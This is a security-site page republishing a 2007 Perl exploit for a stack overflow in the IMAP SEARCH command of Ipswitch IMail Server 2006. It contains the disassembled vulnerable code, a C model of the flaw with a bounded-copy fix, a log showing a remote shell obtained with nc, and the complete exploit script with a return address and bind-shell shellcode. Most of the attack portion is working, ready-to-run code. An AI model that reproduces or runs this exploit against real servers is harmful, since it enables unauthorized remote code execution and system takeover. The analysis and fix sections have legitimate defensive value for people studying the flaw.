IPSwitch IMail Server 2006 SEARCH Remote Stack Overflow Exploit - vulnerability warning - the black bar safety net

2007-07-26T00:00:00
ID MYHACK58:62200716299
Type myhack58
Reporter Anonymous
Modified 2007-07-26T00:00:00

Description

#!/usr/bin/perl

Ipswitch IMail Server 2006 IMAP SEARCH COMMAND Stack Overflow Exploit

Author: ZhenHan.Liu#ph4nt0m.org

Date: 2007-07-25

Team: Ph4nt0m Security Team (http://www.ph4nt0m.org)

Vuln Found by: Manuel Santamarina Suarez

http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=563

The vulnerable code is here (imap4d32.exe version 6.8.8.1):

00418CCA |. 8B8D 28EFFFFF |MOV ECX,DWORD PTR SS:[EBP-10D8]
00418CD0 |. 0FBE11        |MOVSX EDX,BYTE PTR DS:[ECX]
00418CD3 |. 83FA 22       |CMP EDX,22
00418CD6 |. 75 2A         |JNZ SHORT IMAP4D32.00418D02
00418CD8 |. 8B85 28EFFFFF |MOV EAX,DWORD PTR SS:[EBP-10D8]
00418CDE |. 50            |PUSH EAX ; /String
00418CDF |. FF15 84004300 |CALL DWORD PTR DS:[<&KERNEL32.lstrlenA>] ; \lstrlenA
00418CE5 |. 83E8 02       |SUB EAX,2
00418CE8 |. 50            |PUSH EAX ; /maxlen
00418CE9 |. 8B8D 28EFFFFF |MOV ECX,DWORD PTR SS:[EBP-10D8] ; |
00418CEF |. 83C1 01       |ADD ECX,1 ; |
00418CF2 |. 51            |PUSH ECX ; |src
00418CF3 |. 8D55 AC       |LEA EDX,DWORD PTR SS:[EBP-54] ; |
00418CF6 |. 52            |PUSH EDX ; |dest
00418CF7 |. FF15 00024300 |CALL DWORD PTR DS:[<&MSVCR71.strncpy>] ; \strncpy
00418CFD |. 83C4 0C       |ADD ESP,0C
00418D00 |. EB 13         |JMP SHORT IMAP4D32.00418D15
00418D02 |> 8B85 28EFFFFF |MOV EAX,DWORD PTR SS:[EBP-10D8]
00418D08 |. 50            |PUSH EAX ; /src
00418D09 |. 8D4D AC       |LEA ECX,DWORD PTR SS:[EBP-54] ; |
00418D0C |. 51            |PUSH ECX ; |dest
00418D0D |. E8 7E610100   |CALL <JMP.&MSVCR71.strcpy> ; \strcpy
00418D12 |. 83C4 08       |ADD ESP,8

The programmer has made an extremely stupid mistake.

He checks the argument's first byte: if it is 0x22 ('"'), the surrounding quotes are dropped and strncpy is called; otherwise strcpy is called (in the listing the quoted case falls through to the strncpy call, and the JNZ at 00418CD6 takes the unquoted case to the strcpy call at 00418D0D).

The buffer overflow takes place when strcpy is called.

But the strncpy is also vulnerable, because its count is taken from the source rather than from the destination: it is effectively strncpy(dest, src+1, strlen(src)-2), so the count never limits the copy.

So, whether the command argument starts with a '"' or not, the stack overflow takes place immediately.
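To make the point concrete, the following is an added C example; it is not the vendor's code and not part of the original advisory. It models the two copy paths from the listing against a destination buffer whose size is assumed from the [EBP-54] operand (0x54 = 84 bytes, a working assumption since the page does not give the frame layout), reports how many bytes each path writes for a given SEARCH argument, and places a destination-bounded copy beside it. All function names are hypothetical.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Assumed size of the local buffer at [EBP-54h] in the listing: 0x54 = 84 bytes.
   The real frame layout is not given on the page; this value is a working assumption. */
#define SEARCH_ARG_BUF 0x54

/* Model of the original copy logic (not the vendor's code). Returns how many
   bytes the vulnerable routine writes into the buffer for one argument:
   - first byte '"': strncpy(dest, src + 1, lstrlenA(src) - 2) -> strlen - 2 bytes
   - otherwise:      strcpy(dest, src)                          -> strlen + 1 bytes
   The count handed to strncpy is derived from the source, so it never limits the copy. */
size_t vulnerable_bytes_written(const char *arg) {
    size_t len = strlen(arg);
    if (len >= 2 && arg[0] == '"') {
        return len - 2;          /* only the two quote characters are left out */
    }
    return len + 1;              /* strcpy also writes the terminating NUL */
}

bool would_overflow(const char *arg) {
    return vulnerable_bytes_written(arg) > SEARCH_ARG_BUF;
}

/* Builds a constructed argument of n payload bytes ('A'), optionally wrapped in
   quotes, and reports whether the modelled copy overflows the buffer. */
bool overflows_with_length(size_t n, bool quoted) {
    char buf[512];
    size_t i = 0;
    if (n + 3 > sizeof buf) return true;   /* anything this long overflows anyway */
    if (quoted) buf[i++] = '"';
    memset(buf + i, 'A', n);
    i += n;
    if (quoted) buf[i++] = '"';
    buf[i] = '\0';
    return would_overflow(buf);
}

/* Hardened copy: the bound comes from the destination size, never from the
   source length, and an oversized argument is rejected instead of truncated. */
int copy_search_arg(char *dest, size_t dest_size, const char *arg) {
    size_t len = strlen(arg);
    const char *src = arg;
    if (len >= 2 && arg[0] == '"' && arg[len - 1] == '"') {
        src = arg + 1;           /* strip the surrounding quotes */
        len -= 2;
    }
    if (dest_size == 0 || len >= dest_size) return -1;
    memcpy(dest, src, len);
    dest[len] = '\0';
    return 0;
}

/* Convenience wrapper: length of the safely copied argument, or -1 if rejected. */
int try_copy(const char *arg, size_t dest_size) {
    char dest[128];
    if (dest_size > sizeof dest) dest_size = sizeof dest;
    if (copy_search_arg(dest, dest_size, arg) != 0) return -1;
    return (int)strlen(dest);
}

int main(void) {
    printf("quoted, 84 payload bytes:   %s\n", overflows_with_length(84, true) ? "overflow" : "fits");
    printf("quoted, 85 payload bytes:   %s\n", overflows_with_length(85, true) ? "overflow" : "fits");
    printf("unquoted, 83 payload bytes: %s\n", overflows_with_length(83, false) ? "overflow" : "fits");
    printf("unquoted, 84 payload bytes: %s\n", overflows_with_length(84, false) ? "overflow" : "fits");
    printf("hardened copy of an oversized argument: %d\n", try_copy("hello world", 8));
    return 0;
}
```

The model shows why the two paths differ by exactly one byte: strcpy writes the NUL terminator, while strncpy with a source-derived count stops at the last payload byte without terminating. Neither path consults the destination size, which is what copy_search_arg fixes.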

Multiple SEARCH command keys are vulnerable; in this case we use "SEARCH ON", but others such as "SEARCH BEFORE" will also trigger the overflow.

NOTES: To trigger the vuln, there must be at least one mail in the mailbox!

Bad chars: 0x00 0x0a 0x0d 0x0b 0x09 0x0c 0x20

Tested on Windows 2003 SP1 CN

D:\>perl imap.pl 192.168.226.128 143
* OK IMAP4 Server (IMail 9.10)
0 OK LOGIN completed
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* 1 EXISTS
* 1 RECENT
* OK [UIDVALIDITY 1185337300] UIDs valid
* OK [UIDNEXT 485337302] Predicted next UID
2 OK [READ-WRITE] SELECT completed
-------------- [BEGIN] -------------------
---------------- [END] ------------------

D:\>nc -vv -n 192.168.226.128 1154
(UNKNOWN) [192.168.226.128] 1154 (?) open
Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>

use strict;
use warnings;
use IO::Socket;

# Target IP
my $host = shift;
my $port = shift;
my $account = "void";
my $password = "ph4nt0m.org";

my $pad1 = "void[at]ph4nt0m.org_" x 4 . "ph4nt0m";
my $pad2 = 'void[at]pstgroup';
my $jmpesp = "\x12\x45\xfa\x7f"; # Windows 2000/xp/2003 Universal

# win32_bind - EXITFUNC=thread LPORT=1154 Size=344 Encoder=Pex http://metasploit.com
my $shellcode =
"\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xb6".
"\x78\xf8\x75\x83\xee\xfc\xe2\xf4\x4a\x12\x13\x38\x5e\x81\x07\x8a".
"\x49\x18\x73\x19\x92\x5c\x73\x30\x8a\xf3\x84\x70\xce\x79\x17\xfe".
"\xf9\x60\x73\x2a\x96\x79\x13\x3c\x3d\x4c\x73\x74\x58\x49\x38\xec".
"\x1a\xfc\x38\x01\xb1\xb9\x32\x78\xb7\xba\x13\x81\x8d\x2c\xdc\x5d".
"\xc3\x9d\x73\x2a\x92\x79\x13\x13\x3d\x74\xb3\xfe\xe9\x64\xf9\x9e".
"\xb5\x54\x73\xfc\xda\x5c\xe4\x14\x75\x49\x23\x11\x3d\x3b\xc8\xfe".
"\xf6\x74\x73\x05\xaa\xd5\x73\x35\xbe\x26\x90\xfb\xf8\x76\x14\x25".
"\x49\xae\x9e\x26\xd0\x10\xcb\x47\xde\x0f\x8b\x47\xe9\x2c\x07\xa5".
"\xde\xb3\x15\x89\x8d\x28\x07\xa3\xe9\xf1\x1d\x13\x37\x95\xf0\x77".
"\xe3\x12\xfa\x8a\x66\x10\x21\x7c\x43\xd5\xaf\x8a\x60\x2b\xab\x26".
"\xe5\x2b\xbb\x26\xf5\x2b\x07\xa5\xd0\x10\xfc\xf7\xd0\x2b\x71\x94".
"\x23\x10\x5c\x6f\xc6\xbf\xaf\x8a\x60\x12\xe8\x24\xe3\x87\x28\x1d".
"\x12\xd5\xd6\x9c\xe1\x87\x2e\x26\xe3\x87\x28\x1d\x53\x31\x7e\x3c".
"\xe1\x87\x2e\x25\xe2\x2c\xad\x8a\x66\xeb\x90\x92\xcf\xbe\x81\x22".
"\x49\xae\xad\x8a\x66\x1e\x92\x11\xd0\x10\x9b\x18\x3f\x9d\x92\x25".
"\xef\x51\x34\xfc\x51\x12\xbc\xfc\x54\x49\x38\x86\x1c\x86\xba\x58".
"\x48\x3a\xd4\xe6\x3b\x02\xc0\xde\x1d\xd3\x90\x07\x48\xcb\xee\x8a".
"\xc3\x3c\x07\xa3\xed\x2f\xaa\x24\xe7\x29\x92\x74\xe7\x29\xad\x24".
"\x49\xa8\x90\xd8\x6f\x7d\x36\x26\x49\xae\x92\x8a\x49\x4f\x07\xa5".
"\x3d\x2f\x04\xf6\x72\x1c\x07\xa3\xe4\x87\x28\x1d\x59\xb6\x18\x15".
"\xe5\x87\x2e\x8a\x66\x78\xf8\x75";

my $sock = IO::Socket::INET->new(
    PeerHost => $host,
    PeerPort => $port,
    proto    => "tcp"
) || die "Connect error.\n";

my $res = <$sock>;
print $res;
if( $res !~ /OK/ ) { exit(-1); }

# login
print $sock "0 LOGIN $account $password\r\n";
print $res = <$sock>;
if( $res !~ /0 OK/ ) { exit(-1); }

# select
print $sock "1 SELECT INBOX\r\n";
while(1) {
    print $res = <$sock>;
    if($res =~ /1 OK/) { last; }
    elsif($res =~ /1 NO/ || $res =~ /BAD/) { exit(-1); }
    else { next; }
}

# search
my $payload = $pad1.$jmpesp.$pad2.$shellcode;
print $sock "2 SEARCH ON <$payload>\r\n";

$sock->close();